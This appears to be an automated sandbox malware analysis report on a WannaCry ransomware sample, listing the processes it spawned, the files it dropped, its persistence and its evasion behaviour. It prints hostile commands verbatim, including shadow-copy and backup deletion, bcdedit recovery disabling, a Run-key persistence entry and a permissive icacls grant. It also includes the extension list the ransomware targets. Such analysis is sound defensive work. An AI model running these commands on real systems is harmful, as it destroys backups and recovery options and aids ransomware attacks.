                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 140021675181576.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 37_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,37_2_00401000
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 37_2_00401398 Sleep,AdjustTokenPrivileges,37_2_00401398
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\b.wnryJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Adobe\Temp\~SDF298.tmpJump to behavior
                  Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@38/892@0/5
                  Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,25_2_00403A20
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1612265367.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1634829824.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.1651673511.0000000000A53000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2865447420.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, 2N2jefqo8e.exe, 00000000.00000003.2953385733.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
                  Source: 2N2jefqo8e.exe, 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 140021675181576.bat
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWindow found: window name: RICHEDITJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLLJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: 2N2jefqo8e.exeStatic file information: File size 3514368 > 1048576
                  Source: 2N2jefqo8e.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00413060 push eax; ret 25_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00413060 push eax; ret 29_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00413060 push eax; ret 38_2_0041308E
                  Source: libeay32.dll.25.drStatic PE information: section name: /4
                  Source: libeay32.dll.25.drStatic PE information: section name: /19
                  Source: libeay32.dll.25.drStatic PE information: section name: /31
                  Source: libeay32.dll.25.drStatic PE information: section name: /45
                  Source: libeay32.dll.25.drStatic PE information: section name: /57
                  Source: libeay32.dll.25.drStatic PE information: section name: /70
                  Source: libeay32.dll.25.drStatic PE information: section name: /81
                  Source: libeay32.dll.25.drStatic PE information: section name: /92
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /4
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /19
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /31
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /45
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /57
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /70
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /81
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /92
                  Source: libssp-0.dll.25.drStatic PE information: section name: /4
                  Source: libssp-0.dll.25.drStatic PE information: section name: /19
                  Source: libssp-0.dll.25.drStatic PE information: section name: /31
                  Source: libssp-0.dll.25.drStatic PE information: section name: /45
                  Source: libssp-0.dll.25.drStatic PE information: section name: /57
                  Source: libssp-0.dll.25.drStatic PE information: section name: /70
                  Source: libssp-0.dll.25.drStatic PE information: section name: /81
                  Source: libssp-0.dll.25.drStatic PE information: section name: /92
                  Source: ssleay32.dll.25.drStatic PE information: section name: /4
                  Source: ssleay32.dll.25.drStatic PE information: section name: /19
                  Source: ssleay32.dll.25.drStatic PE information: section name: /31
                  Source: ssleay32.dll.25.drStatic PE information: section name: /45
                  Source: ssleay32.dll.25.drStatic PE information: section name: /57
                  Source: ssleay32.dll.25.drStatic PE information: section name: /70
                  Source: ssleay32.dll.25.drStatic PE information: section name: /81
                  Source: ssleay32.dll.25.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70

                  Persistence and Installation Behavior

                  barindex
                  Command shell drops VBS files
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbsJump to behavior
                  Uses bcdedit to modify the Windows boot settings
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Drops PE files to the document folder of the user
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\Public\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\taskdl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\Default\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\taskse.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDF41B.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDF41C.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDF41D.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SDF621.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SDF622.tmpJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files in the recycle bin to hide itself
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\$Recycle.Bin\~SDF25D.tmpJump to behavior
                  May use the Tor software to hide its network traffic
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onion-port
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,25_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,29_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,38_2_004067F0
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 37_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,37_2_00401000
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D30025_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D4C025_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D30029_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D4C029_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D30038_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D4C038_2_0040D4C0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
